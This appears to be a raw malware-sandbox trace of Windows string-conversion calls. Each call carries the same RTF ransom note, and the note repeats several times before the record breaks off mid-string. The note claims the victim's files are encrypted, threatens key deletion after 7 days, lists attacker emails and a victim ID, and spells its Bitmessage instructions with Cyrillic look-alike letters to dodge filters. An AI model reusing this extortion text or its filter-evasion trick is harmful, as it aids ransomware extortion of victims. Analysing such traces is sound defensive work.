INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.338] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.338] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2373dc8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 